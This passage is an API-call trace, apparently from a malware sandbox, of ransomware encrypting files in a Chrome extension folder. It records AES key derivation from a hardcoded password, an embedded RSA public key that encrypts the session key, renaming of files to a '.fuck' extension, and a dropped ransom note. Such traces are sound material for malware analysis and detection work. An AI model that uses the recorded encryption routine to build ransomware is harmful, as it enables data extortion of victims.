lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.848] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.848] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.855] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.855] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.855] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.855] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.856] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.856] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.856] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.856] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.856] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.856] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.856] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.856] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.856] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.856] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.856] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.857] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.857] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.857] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.857] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.857] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.857] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.857] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.857] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.857] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.857] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.857] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.857] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.857] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.857] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.857] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.857] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.857] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.857] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.857] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.858] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.858] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.858] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.858] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.858] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.858] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.858] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.858] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.858] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.858] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.858] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.858] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.858] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.858] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.858] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.858] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.858] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.858] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xdc, lpOverlapped=0x0) returned 1 [0263.858] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xdc, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0263.858] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0263.859] CloseHandle (hObject=0x5d5c) returned 1 [0263.859] CloseHandle (hObject=0x5d60) returned 1 [0263.859] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json"), bFailIfExists=0) returned 1 [0263.865] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x0) returned 1 [0263.865] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json.gsg")) returned 1 [0263.867] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json.fuck")) returned 1 [0263.868] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0263.868] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0263.868] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.868] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.868] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0263.869] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\readme_back_files.htm")) returned 0xffffffff [0263.869] AreFileApisANSI () returned 1 [0263.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 165 [0263.869] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.870] GetFileType (hFile=0x5d64) returned 0x1 [0263.870] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.871] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.871] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0263.871] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.872] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.872] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.872] GetLastError () returned 0x0 [0263.872] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json")) returned 0x20 [0263.872] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x80) returned 1 [0263.872] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.873] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.883] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.884] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.886] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.886] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0263.886] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.886] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0263.886] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.886] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.886] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e74d58) returned 1 [0263.886] CryptImportPublicKeyInfo (in: hCryptProv=0x2e74d58, dwCertEncodingType=0x1, pInfo=0x2eaf230*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaf260*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaf268*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e300) returned 1 [0263.886] CryptEncrypt (in: hKey=0x2e7e300, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.887] CryptEncrypt (in: hKey=0x2e7e300, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e75220*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e75220*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.887] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e75220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e75220*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.888] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.898] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.898] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 